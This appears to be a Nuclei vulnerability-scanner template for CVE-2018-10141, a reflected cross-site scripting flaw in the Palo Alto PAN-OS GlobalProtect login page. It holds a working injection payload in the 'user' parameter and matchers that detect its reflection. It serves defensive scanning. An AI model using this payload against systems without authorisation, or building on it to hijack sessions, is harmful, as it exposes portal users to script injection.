51 lines
1.9 KiB
YAML
51 lines
1.9 KiB
YAML
id: CVE-2018-10141
|
|
|
|
info:
|
|
name: Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting
|
|
author: dhiyaneshDk
|
|
severity: medium
|
|
description: Palo Alto Networks PAN-OS before 8.1.4 GlobalProtect Portal Login page allows an unauthenticated attacker to inject arbitrary JavaScript or HTML, making it vulnerable to cross-site scripting.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.
|
|
remediation: |
|
|
Upgrade to Palo Alto Networks PAN-OS GlobalProtect VPN client version 8.1.4 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://security.paloaltonetworks.com/CVE-2018-10141
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-10141
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
- https://github.com/Elsfa7-110/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2018-10141
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00126
|
|
epss-percentile: 0.47114
|
|
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: paloaltonetworks
|
|
product: pan-os
|
|
tags: cve,cve2018,panos,vpn,globalprotect,xss,paloaltonetworks
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'var valueUser = "j";-alert(1)-"x";'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450220507ffbfb76be5730a985c05105e1573ea10692076caecd9b07d4f35e8f7a889e022100b86bc6fa194d4eafaad61560a771f32fee62f36c99f9cc3cda50479528ee67f0:922c64590222798bb761d5b6d8e72950 |